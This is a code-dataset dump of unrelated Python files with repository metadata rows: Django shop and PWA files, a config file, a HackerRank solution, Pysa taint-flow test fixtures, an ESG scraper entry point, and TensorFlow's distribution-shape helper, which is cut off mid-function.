    def __ne__(self, other):
        """True when the two objects are not equal."""
        return not self == other
| 26.701613 | 479 | 0.525823 |
795bc9120b193e941b608f1530d681ff5d9b1fe9 | 285 | py | Python | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null |
from shop.serializers.bases import ProductSerializer
class ProductDetailSerializer(ProductSerializer):
    """Detail serializer for products: extends the base ProductSerializer's
    Meta with the explicit field list to expose on the detail endpoint."""
    class Meta(ProductSerializer.Meta):
        # Field order here is the output order of the serialized representation.
        fields = ['product_name', 'slug', 'unit_price', 'manufacturer', 'card_type', 'speed',
                  'product_code', 'storage']
| 31.666667 | 93 | 0.698246 |
795bca1e4b1b43ffeb3ab7aafed3ae76857b84bf | 90 | py | Python | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | DOCKER_IMAGE = "docker_flask:0.0.1"
# Host port the container's service is exposed on.
EXPOSE_PORT = 8180
# NOTE(review): '127.0.0' looks like a truncated loopback address/prefix
# ('127.0.0.1'?) — confirm how consumers of this constant complete it.
BASE_CONTAINER_ADDRESS = '127.0.0'
| 22.5 | 35 | 0.766667 |
795bca2e144640be3e98bd5aac1dbae52f4dfc4d | 83 | py | Python | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | 1 | 2019-06-09T00:04:56.000Z | 2019-06-09T00:04:56.000Z | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | 19 | 2019-06-09T14:45:52.000Z | 2019-06-17T18:52:53.000Z | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | null | null | null | # Get a
# Read the two integers from stdin, one per line.
a = int(input())
b = int(input())
# Print sum, difference, and product, each on its own line.
for value in (a + b, a - b, a * b):
    print(value)
795bcb38a2192072c8aee722a7d703f93d4a8c26 | 4,359 | py | Python | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | ddainesefb/pyre-check | dedd67493f4334b6b5bf446260ed364b35b4a6aa | [
"MIT"
] | null | null | null | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | ddainesefb/pyre-check | dedd67493f4334b6b5bf446260ed364b35b4a6aa | [
"MIT"
] | 1 | 2021-08-16T12:11:37.000Z | 2021-08-16T12:11:37.000Z | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | abishekvashok/pyre-check | 20ae7df26216db06fcb17246f6125f4b6655890f | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from builtins import __test_sink, __test_source
from typing import Dict, List, Tuple
# Pysa taint-in-taint-out (TITO) integration fixtures: these definitions are
# analyzed statically, never executed, so some bodies are intentionally
# skeletal or would not run correctly at runtime.
def some_service(id):
    ...
def _unpack(tuple):
    ...
class DataRecord:
    ...
class Data:
    def __init__(self, a, b):
        self.a = a
        self.b = b
def get_data(x):
    # Taint on x flows into both dict values.
    return {"name": x, "id": x}
def product_data(x):
    # NOTE(review): attribute access (data.id / data.name) on the dict
    # returned by get_data would fail at runtime; presumably fine here
    # because this fixture is only analyzed, not run.
    data = get_data(x)
    if x:
        parent = product_data(x.parent)  # recursive taint propagation
    else:
        parent = None
    is_blocked = some_service(data.id)
    report_tuple = DataRecord(id=data.id, username=data.name, isBlocked=is_blocked)
    return {
        "report": _unpack(report_tuple),
        "id": data.id,
        "parent_data": parent,
        "name": data.name,
    }
def product_data_wrapper(x):
    # One extra call frame: taint must propagate through the wrapper.
    return product_data(x)
def tito():
    # Entry point: test source flows through the wrapper chain into the return.
    return product_data_wrapper(__test_source())
def via_getattr(x, y):
    # TITO through getattr: either x.foo or the default y may flow to the return.
    return getattr(x, "foo", y)
class Recursive:
    def __init__(self, select):
        # Recursive object construction (via get_related below); exercises
        # the analyzer on mutually recursive constructors.
        self.init_list = [
            f[0].target.attname for f in select[self.cols_start : self.cols_end]
        ]
        self.related = get_related(select)
def get_related(select):
    return Recursive(select)
class FieldIsTITO:
    # Attribute whose reads are modeled as taint-in-taint-out.
    add_tito: int = 1
def adds_tito(x: FieldIsTITO) -> int:
    return x.add_tito
class InheritsFromTITO(FieldIsTITO):
    pass
def adds_tito_inherited(x: InheritsFromTITO) -> int:
    # Same field read, but through a subclass — inherited TITO.
    return x.add_tito
def adds_tito_with_indirect_sink(src: FieldIsTITO) -> None:
    indirect_sink(src)
def indirect_sink(x: FieldIsTITO) -> None:
    __test_sink(x.add_tito)
def issue_with_indirect_sink_tito():
    # source -> field -> indirect sink: should be reported as an issue.
    x = __test_source()
    adds_tito_with_indirect_sink(x)
# The following three functions return wide dictionaries of distinct member
# reads; presumably they exercise the analyzer's limit on tracked return
# access paths (widening/approximation) — confirm against Pysa's config.
def approximate_return_access_paths(x):
    return {
        "a": x.a,
        "b": x.b,
        "c": x.c,
        "d": x.d,
        "e": x.e,
        "f": x.f,
        "g": x.g,
        "h": x.h,
        "j": x.j,
        "k": x.k,
        "l": x.l,
    }
def approximate_return_access_paths_common_prefix_input(x):
    # Same shape, but every read shares the common input prefix x.y.
    return {
        "a": x.y.a,
        "b": x.y.b,
        "c": x.y.c,
        "d": x.y.d,
        "e": x.y.e,
        "f": x.y.f,
        "g": x.y.g,
        "h": x.y.h,
        "j": x.y.j,
        "k": x.y.k,
        "l": x.y.l,
    }
def approximate_return_access_paths_common_prefix_output(x):
    # Same shape, but the outputs share the common key prefix "a".
    return {
        "a": {
            "a": x.a,
            "b": x.b,
            "c": x.c,
            "d": x.d,
            "e": x.e,
            "f": x.f,
            "g": x.g,
            "h": x.h,
            "j": x.j,
            "k": x.k,
            "l": x.l,
        }
    }
async def return_taint(tainted: str, b1: str, b2: str) -> Tuple[str, str, str]:
    # Only the first tuple element carries taint.
    return tainted, b1, b2
async def test_tuple_tito_indices():
    # Unpacks an awaited tuple; the sink receives the untainted b2, so the
    # analyzer should NOT report an issue here if tuple indices are tracked.
    tainted, b1, b2 = await return_taint(__test_source(), "", "")
    __test_sink(b2)
def return_taint_in_list(tainted: str, a: str, b: str) -> List[str]:
    # Taint enters one element of a list return value.
    return [tainted, a, b]
def add_feature(arg):
    # Identity function; presumably annotated in a .pysa model to attach a
    # via-feature to flows through it — confirm against the model files.
    return arg
def tito_with_feature(arg):
    if arg:
        return arg
    else:
        return add_feature(arg)
def test_always_via_feature():
    __test_sink(tito_with_feature(__test_source()))
# Test TITO through explicit super.
class GetQuery:
    def __init__(self, arg):
        self.arg = arg
class GetUser(GetQuery):
    def __init__(self, arg):
        # Explicit base-class __init__ call (not super()): taint must still
        # flow from arg into self.arg.
        GetQuery.__init__(self, arg)
def test_explicit_call_to_superclass():
    user = GetUser(__test_source())
    __test_sink(user.arg)
def evaluate_lazy(payload: Dict[str, str]):
    # Identity dict comprehension: taint should pass through keys/values.
    return {key: value for key, value in payload.items()}
def test_simplified_evaluator():
    __test_sink(evaluate_lazy(__test_source()))
class ComplexEvaluator:
    def evaluate_lazy_field(self, field):
        if callable(field):
            return field()
        else:
            return field
    def evaluate_lazy_payload(self, payload):
        # Nested closure recursing through self: a harder TITO case than
        # evaluate_lazy above.
        def _evaluate(field):
            if isinstance(field, dict):
                return self.evaluate_lazy_payload(field)
            return self.evaluate_lazy_field(field)
        return {key: _evaluate(value) for key, value in payload.items()}
def test_complex_evaluator(evaluator: ComplexEvaluator):
    __test_sink(evaluator.evaluate_lazy_payload(__test_source()))
| 19.373333 | 83 | 0.590961 |
795bcb612af9979613f4b9db3686d9152faeac50 | 833 | py | Python | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | """djangopwa URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
    path('admin/', admin.site.urls),
    # Both includes are mounted at the root; Django tries posts.urls first
    # and falls through to pwa.urls when nothing there matches.
    path(r'', include('posts.urls')),  # r'' is equivalent to '' — raw prefix is redundant
    path('', include('pwa.urls')),
]
| 34.708333 | 77 | 0.695078 |
795bcbac231b87126d0462b08df549784625204a | 485 | py | Python | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | null | null | null | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | 2 | 2022-02-28T21:04:22.000Z | 2022-03-01T21:05:37.000Z | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.translation import gettext as _
from kaffepause.common.bases import NeomodelRelationshipEnum
class InvitationReply(models.TextChoices):
    """Possible responses to a break invitation (member order is the
    user-visible choice order)."""
    ACCEPTED = "accepted"
    DECLINED = "declined"
    IGNORED = "ignored"
class BreakRelationship(NeomodelRelationshipEnum):
    """Graph relationship types used for breaks; values are the translated
    display labels (gettext)."""
    PARTICIPATED_IN = _("Participated in")
    SENT = _("Sent")
    TO = _("To")
    REGARDING = _("Regarding")
    ACCEPTED = _("Accepted")
    DECLINED = _("Declined")
| 24.25 | 60 | 0.715464 |
795bcbcf5772221d7f5fb9d5a52c8acf2c1ec97c | 687 | py | Python | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | 14 | 2021-09-01T15:46:50.000Z | 2022-03-28T00:15:30.000Z | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | null | null | null | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | 4 | 2021-12-18T06:50:57.000Z | 2022-03-30T11:25:18.000Z | """
This script allows the user to scrape the ESG and CSR ratings and the
financial metrics of companies from the following websites: SustainAnalytics,
S&P Global, CSR HUB, MSCI, and Yahoo Finance.
This tool accepts a list of company names in comma-separated-value
(.csv) file format as input.
The output is a .csv file with each company name and its corresponding
ESG/CSR ratings and financial metrics.
To run on the example dataset (Forbes.csv, provided with this package), enter 0
for the companies filename and the header name.
This script will ask the user to input a number corresponding to the website
from which the information is to be scraped.
"""
from .scraper import WebScraper
# Module entry point: running `python -m ...` executes the scraper directly.
# Presumably get_esgdata is a class/static method — it is called on the class.
WebScraper.get_esgdata()
| 31.227273 | 76 | 0.791849 |
795bccb800e15a72f566065a8eaa253ab2935164 | 18,905 | py | Python | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 1 | 2018-11-15T08:44:10.000Z | 2018-11-15T08:44:10.000Z | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 1 | 2021-03-06T02:46:54.000Z | 2021-03-06T02:46:54.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A helper class for inferring Distribution shape."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
class _DistributionShape(object):
"""Manage and manipulate `Distribution` shape.
Terminology:
Recall that a `Tensor` has:
- `shape`: size of `Tensor` dimensions,
- `ndims`: size of `shape`; number of `Tensor` dimensions,
- `dims`: indexes into `shape`; useful for transpose, reduce.
`Tensor`s sampled from a `Distribution` can be partitioned by `sample_dims`,
`batch_dims`, and `event_dims`. To understand the semantics of these
dimensions, consider when two of the three are fixed and the remaining
is varied:
- `sample_dims`: indexes independent draws from identical
parameterizations of the `Distribution`.
- `batch_dims`: indexes independent draws from non-identical
parameterizations of the `Distribution`.
- `event_dims`: indexes event coordinates from one sample.
The `sample`, `batch`, and `event` dimensions constitute the entirety of a
`Distribution` `Tensor`'s shape.
The dimensions are always in `sample`, `batch`, `event` order.
Purpose:
This class partitions `Tensor` notions of `shape`, `ndims`, and `dims` into
`Distribution` notions of `sample,` `batch,` and `event` dimensions. That
is, it computes any of:
```
sample_shape batch_shape event_shape
sample_dims batch_dims event_dims
sample_ndims batch_ndims event_ndims
```
for a given `Tensor`, e.g., the result of
`Distribution.sample(sample_shape=...)`.
For a given `Tensor`, this class computes the above table using minimal
information: `batch_ndims` and `event_ndims`.
Examples of `Distribution` `shape` semantics:
- Sample dimensions:
Computing summary statistics, i.e., the average is a reduction over sample
dimensions.
```python
sample_dims = [0]
tf.reduce_mean(Normal(mu=1.3, sigma=1.).sample_n(1000),
reduction_indices=sample_dims) # ~= 1.3
```
- Batch dimensions:
Monte Carlo estimation of a marginal probability:
Average over batch dimensions where batch dimensions are associated with
random draws from a prior.
E.g., suppose we want to find the Monte Carlo estimate of the marginal
distribution of a `Normal` with a random `Laplace` location:
```
P(X=x) = integral P(X=x|y) P(Y=y) dy
~= 1/n sum_{i=1}^n P(X=x|y_i), y_i ~iid Laplace(0,1)
= tf.reduce_mean(Normal(mu=Laplace(0., 1.).sample_n(n=1000),
sigma=tf.ones(1000)).pdf(x),
reduction_indices=batch_dims)
```
The `Laplace` distribution generates a `Tensor` of shape `[1000]`. When
fed to a `Normal`, this is interpreted as 1000 different locations, i.e.,
1000 non-identical Normals. Therefore a single call to `pdf(x)` yields
1000 probabilities, one for every location. The average over this batch
yields the marginal.
- Event dimensions:
Computing the determinant of the Jacobian of a function of a random
variable involves a reduction over event dimensions.
E.g., Jacobian of the transform `Y = g(X) = exp(X)`:
```python
tf.div(1., tf.reduce_prod(x, event_dims))
```
Examples using this class:
Write `S, B, E` for `sample_shape`, `batch_shape`, and `event_shape`.
```python
# 150 iid samples from one multivariate Normal with two degrees of freedom.
mu = [0., 0]
sigma = [[1., 0],
[0, 1]]
mvn = MultivariateNormal(mu, sigma)
rand_mvn = mvn.sample(sample_shape=[3, 50])
shaper = DistributionShape(batch_ndims=0, event_ndims=1)
S, B, E = shaper.get_shape(rand_mvn)
# S = [3, 50]
# B = []
# E = [2]
# 12 iid samples from one Wishart with 2x2 events.
sigma = [[1., 0],
[2, 1]]
wishart = Wishart(df=5, scale=sigma)
rand_wishart = wishart.sample(sample_shape=[3, 4])
shaper = DistributionShape(batch_ndims=0, event_ndims=2)
S, B, E = shaper.get_shape(rand_wishart)
# S = [3, 4]
# B = []
# E = [2, 2]
# 100 iid samples from two, non-identical trivariate Normal distributions.
mu = ... # shape(2, 3)
sigma = ... # shape(2, 3, 3)
X = MultivariateNormal(mu, sigma).sample(shape=[4, 25])
# S = [4, 25]
# B = [2]
# E = [3]
```
Argument Validation:
When `validate_args=False`, checks that cannot be done during
graph construction are performed at graph execution. This may result in a
performance degradation because data must be switched from GPU to CPU.
For example, when `validate_args=False` and `event_ndims` is a
non-constant `Tensor`, it is checked to be a non-negative integer at graph
execution. (Same for `batch_ndims`). Constant `Tensor`s and non-`Tensor`
arguments are always checked for correctness since this can be done for
"free," i.e., during graph construction.
"""
  def __init__(self,
               batch_ndims=None,
               event_ndims=None,
               validate_args=False,
               name="DistributionShape"):
    """Construct `DistributionShape` with fixed `batch_ndims`, `event_ndims`.
    `batch_ndims` and `event_ndims` are fixed throughout the lifetime of a
    `Distribution`. They may only be known at graph execution.
    If both `batch_ndims` and `event_ndims` are python scalars (rather than
    either being a `Tensor`), functions in this class automatically perform
    sanity checks during graph construction.
    Args:
      batch_ndims: `Tensor`. Number of `dims` (`rank`) of the batch portion of
        indexes of a `Tensor`. A "batch" is a non-identical distribution, i.e,
        Normal with different parameters.
      event_ndims: `Tensor`. Number of `dims` (`rank`) of the event portion of
        indexes of a `Tensor`. An "event" is what is sampled from a
        distribution, i.e., a trivariate Normal has an event shape of [3] and a
        4 dimensional Wishart has an event shape of [4, 4].
      validate_args: `Boolean`, default `False`. When `True`, non-`tf.constant`
        `Tensor` arguments are checked for correctness. (`tf.constant`
        arguments are always checked.)
      name: `String`. The name prepended to Ops created by this class.
    Raises:
      ValueError: if either `batch_ndims` or `event_ndims` are: `None`,
        negative, not `int32`.
    """
    # Fail fast on None before building any graph ops.
    if batch_ndims is None: raise ValueError("batch_ndims cannot be None")
    if event_ndims is None: raise ValueError("event_ndims cannot be None")
    # Keep raw values first; both are re-assigned below with validated tensors.
    self._batch_ndims = batch_ndims
    self._event_ndims = event_ndims
    self._validate_args = validate_args
    with ops.name_scope(name) as ns:
      # Store the fully-qualified scope string so later ops nest under it.
      self._name = ns
      with ops.name_scope("init"):
        # Validation helpers (_assert_non_negative_int32_scalar,
        # _introspect_ndims) are defined later in this class; they also
        # pre-compute the static value and an "is zero" predicate used by
        # the shape-manipulation methods.
        self._batch_ndims = self._assert_non_negative_int32_scalar(
            ops.convert_to_tensor(
                batch_ndims, name="batch_ndims"))
        self._batch_ndims_static, self._batch_ndims_is_0 = (
            self._introspect_ndims(self._batch_ndims))
        self._event_ndims = self._assert_non_negative_int32_scalar(
            ops.convert_to_tensor(
                event_ndims, name="event_ndims"))
        self._event_ndims_static, self._event_ndims_is_0 = (
            self._introspect_ndims(self._event_ndims))
  # Read-only accessors over the values fixed in __init__.
  @property
  def name(self):
    """Name given to ops created by this class."""
    return self._name
  @property
  def batch_ndims(self):
    """Returns number of dimensions corresponding to non-identical draws."""
    return self._batch_ndims
  @property
  def event_ndims(self):
    """Returns number of dimensions needed to index a sample's coordinates."""
    return self._event_ndims
  @property
  def validate_args(self):
    """Returns True if graph-runtime `Tensor` checks are enabled."""
    return self._validate_args
def get_ndims(self, x, name="get_ndims"):
"""Get `Tensor` number of dimensions (rank).
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
ndims: Scalar number of dimensions associated with a `Tensor`.
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
ndims = x.get_shape().ndims
if ndims is None:
return array_ops.rank(x, name="ndims")
return ops.convert_to_tensor(ndims, dtype=dtypes.int32, name="ndims")
  def get_sample_ndims(self, x, name="get_sample_ndims"):
    """Returns number of dimensions corresponding to iid draws ("sample").
    Args:
      x: `Tensor`.
      name: `String`. The name to give this op.
    Returns:
      sample_ndims: `Tensor` (0D, `int32`).
    Raises:
      ValueError: if `sample_ndims` is calculated to be negative.
    """
    with self._name_scope(name, values=[x]):
      ndims = self.get_ndims(x, name=name)
      if self._is_all_constant_helper(ndims, self.batch_ndims,
                                      self.event_ndims):
        # Static path: every rank is known at graph-construction time, so
        # the subtraction and the negativity check happen in Python now.
        ndims = tensor_util.constant_value(ndims)
        sample_ndims = (ndims - self._batch_ndims_static -
                        self._event_ndims_static)
        if sample_ndims < 0:
          raise ValueError(
              "expected batch_ndims(%d) + event_ndims(%d) <= ndims(%d)" %
              (self._batch_ndims_static, self._event_ndims_static, ndims))
        return ops.convert_to_tensor(sample_ndims, name="sample_ndims")
      else:
        # Dynamic path: build graph ops; the non-negativity check (when
        # validate_args is set) is deferred to graph execution through a
        # control dependency on the assert op.
        with ops.name_scope(name="sample_ndims"):
          sample_ndims = ndims - self.batch_ndims - self.event_ndims
          if self.validate_args:
            sample_ndims = control_flow_ops.with_dependencies(
                [check_ops.assert_non_negative(sample_ndims)], sample_ndims)
        return sample_ndims
  def get_dims(self, x, name="get_dims"):
    """Returns dimensions indexing `sample_shape`, `batch_shape`, `event_shape`.
    Example:
    ```python
    x = ... # Tensor with shape [4, 3, 2, 1]
    sample_dims, batch_dims, event_dims = _DistributionShape(
      batch_ndims=2, event_ndims=1).get_dims(x)
    # sample_dims == [0]
    # batch_dims == [1, 2]
    # event_dims == [3]
    # Note that these are not the shape parts, but rather indexes into shape.
    ```
    Args:
      x: `Tensor`.
      name: `String`. The name to give this op.
    Returns:
      sample_dims: `Tensor` (1D, `int32`).
      batch_dims: `Tensor` (1D, `int32`).
      event_dims: `Tensor` (1D, `int32`).
    """
    with self._name_scope(name, values=[x]):
      def make_dims(start_sum, size, name):
        """Closure to make dims range."""
        # start_sum is a tuple of sizes of the partitions to the left; the
        # range for this partition begins at their sum. An empty tuple is
        # replaced by a scalar zero tensor so sum() below is well-defined.
        start_sum = start_sum if start_sum else (
            array_ops.zeros((), dtype=dtypes.int32, name="zero"),)
        if self._is_all_constant_helper(size, *start_sum):
          # All sizes statically known: compute the index list in Python.
          start = sum(tensor_util.constant_value(s) for s in start_sum)
          stop = start + tensor_util.constant_value(size)
          return ops.convert_to_tensor(
              list(range(start, stop)), dtype=dtypes.int32, name=name)
        else:
          # Otherwise emit a dynamic tf.range over the partition.
          start = sum(start_sum)
          return math_ops.range(start, start + size)
      sample_ndims = self.get_sample_ndims(x, name=name)
      # Dimensions are always laid out sample, then batch, then event.
      return (make_dims((), sample_ndims, name="sample_dims"),
              make_dims((sample_ndims,), self.batch_ndims, name="batch_dims"),
              make_dims((sample_ndims, self.batch_ndims),
                        self.event_ndims, name="event_dims"))
  def get_shape(self, x, name="get_shape"):
    """Returns `Tensor`'s shape partitioned into `sample`, `batch`, `event`.
    Args:
      x: `Tensor`.
      name: `String`. The name to give this op.
    Returns:
      sample_shape: `Tensor` (1D, `int32`).
      batch_shape: `Tensor` (1D, `int32`).
      event_shape: `Tensor` (1D, `int32`).
    """
    with self._name_scope(name, values=[x]):
      x = ops.convert_to_tensor(x, name="x")
      def slice_shape(start_sum, size, name):
        """Closure to slice out shape."""
        # start_sum: tuple of sizes of partitions to the left; this
        # partition covers shape indices [sum(start_sum), sum+size).
        start_sum = start_sum if start_sum else (
            array_ops.zeros((), dtype=dtypes.int32, name="zero"),)
        if (x.get_shape().ndims is not None and
            self._is_all_constant_helper(size, *start_sum)):
          # Static path: slice the statically-known shape in Python — but
          # only if every dimension in the slice is itself known.
          start = sum(tensor_util.constant_value(s) for s in start_sum)
          stop = start + tensor_util.constant_value(size)
          slice_ = x.get_shape()[start:stop].as_list()
          if all(s is not None for s in slice_):
            return ops.convert_to_tensor(slice_, dtype=dtypes.int32, name=name)
          # Fall-through intended.
        # Dynamic path: slice the runtime shape tensor.
        return array_ops.slice(array_ops.shape(x), (sum(start_sum),), (size,))
      sample_ndims = self.get_sample_ndims(x, name=name)
      # Shape is always laid out sample, then batch, then event.
      return (slice_shape((), sample_ndims,
                          name="sample_shape"),
              slice_shape((sample_ndims,), self.batch_ndims,
                          name="batch_shape"),
              slice_shape((sample_ndims, self.batch_ndims), self.event_ndims,
                          name="event_shape"))
  def make_batch_of_event_sample_matrices(
      self, x, name="make_batch_of_event_sample_matrices"):
    """Reshapes/transposes `Distribution` `Tensor` from S+B+E to B_+E_+S_.
    Where:
      - `B_ = B if B else [1]`,
      - `E_ = E if E else [1]`,
      - `S_ = [tf.reduce_prod(S)]`.
    Args:
      x: `Tensor`.
      name: `String`. The name to give this op.
    Returns:
      x: `Tensor`. Input transposed/reshaped to `B_+E_+S_`.
      sample_shape: `Tensor` (1D, `int32`).
    """
    with self._name_scope(name, values=[x]):
      x = ops.convert_to_tensor(x, name="x")
      sample_shape, batch_shape, event_shape = self.get_shape(x)
      # Substitute a size-1 dimension when batch/event ndims are zero, so
      # the result always has at least a [1] batch and [1] event part.
      event_shape = distribution_util.pick_vector(
          self._event_ndims_is_0, (1,), event_shape)
      batch_shape = distribution_util.pick_vector(
          self._batch_ndims_is_0, (1,), batch_shape)
      # Collapse all sample dims into one leading -1 dim...
      # (note: axis-first concat(0, values) is the legacy TF argument order)
      new_shape = array_ops.concat(0, ((-1,), batch_shape, event_shape))
      x = array_ops.reshape(x, shape=new_shape)
      # ...then rotate it from leftmost to rightmost: S_+B_+E_ -> B_+E_+S_.
      x = distribution_util.rotate_transpose(x, shift=-1)
      # sample_shape is returned so the caller can invert this op later
      # via undo_make_batch_of_event_sample_matrices.
      return x, sample_shape
def undo_make_batch_of_event_sample_matrices(
    self, x, sample_shape, name="undo_make_batch_of_event_sample_matrices"):
  """Reshapes/transposes `Distribution` `Tensor` from B_+E_+S_ to S+B+E.

  Where:
  - `B_ = B if B else [1]`,
  - `E_ = E if E else [1]`,
  - `S_ = [tf.reduce_prod(S)]`.

  This function "reverses" `make_batch_of_event_sample_matrices`.

  Args:
    x: `Tensor` of shape `B_+E_+S_`.
    sample_shape: `Tensor` (1D, `int32`). Original sample shape as returned
      by `make_batch_of_event_sample_matrices`.
    name: `String`. The name to give this op.

  Returns:
    x: `Tensor`. Input transposed/reshaped to `S+B+E`.
  """
  with self._name_scope(name, values=[x, sample_shape]):
    x = ops.convert_to_tensor(x, name="x")
    sample_shape = ops.convert_to_tensor(sample_shape, name="sample_shape")
    # Move the trailing flattened-sample dim back to the front:
    # B_+E_+S_ -> S_+B_+E_.
    x = distribution_util.rotate_transpose(x, shift=1)
    if self._is_all_constant_helper(self.batch_ndims, self.event_ndims):
      # Static path: batch/event ndims known at graph-build time.
      if self._batch_ndims_is_0 or self._event_ndims_is_0:
        # Drop the size-1 dims that were inserted for scalar batch/event.
        b = ((min(-2, -1 - self._event_ndims_static),)
             if self._batch_ndims_is_0 else ())
        e = (-1,) if self._event_ndims_is_0 else ()
        x = array_ops.squeeze(x, squeeze_dims=b + e)
      _, batch_shape, event_shape = self.get_shape(x)
    else:
      # Dynamic path: slice batch/event shapes out of the runtime shape.
      s = (x.get_shape().as_list() if x.get_shape().is_fully_defined()
           else array_ops.shape(x))
      batch_shape = array_ops.slice(s, (1,), (self.batch_ndims,))
      # Since sample_dims=1 and is left-most, we add 1 to the number of
      # batch_ndims to get the event start dim.
      event_start = array_ops.where(
          self._batch_ndims_is_0, 2, 1 + self.batch_ndims)
      event_shape = array_ops.slice(s, (event_start,), (self.event_ndims,))
    # Unflatten the leading sample dim: S_+B+E -> S+B+E.
    new_shape = array_ops.concat(0, (sample_shape, batch_shape, event_shape))
    x = array_ops.reshape(x, shape=new_shape)
    return x
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
  """Helper function to standardize op scope.

  Nests `name` under this object's own name scope and registers
  `batch_ndims`/`event_ndims` (plus any caller-supplied `values`) with the
  inner scope.

  Args:
    name: `String`, optional inner scope name.
    values: optional list of `Tensor`s to associate with the scope.

  Yields:
    The active (inner) scope name.
  """
  with ops.name_scope(self.name):
    with ops.name_scope(name, values=(
        (values or []) + [self.batch_ndims, self.event_ndims])) as scope:
      yield scope
def _is_all_constant_helper(self, *args):
  """Return True iff every input has a statically-known constant value."""
  for arg in args:
    if tensor_util.constant_value(arg) is None:
      return False
  return True
def _assert_non_negative_int32_scalar(self, x):
  """Helper which ensures that input is a non-negative, int32, scalar.

  Args:
    x: value convertible to a `Tensor`; must already be int32-typed.

  Returns:
    `x` as a `Tensor`, possibly with runtime assertions attached as
    control dependencies.

  Raises:
    TypeError: if `x` is not of dtype int32.
    ValueError: if `x` is statically known to be non-scalar or negative.
  """
  x = ops.convert_to_tensor(x, name="x")
  if x.dtype.base_dtype != dtypes.int32.base_dtype:
    raise TypeError("%s.dtype=%s is not %s" % (x.name, x.dtype, dtypes.int32))
  x_value_static = tensor_util.constant_value(x)
  if x.get_shape().ndims is not None and x_value_static is not None:
    # Static path: shape and value are known at graph-build time, so
    # validate eagerly and skip the runtime assertions below.
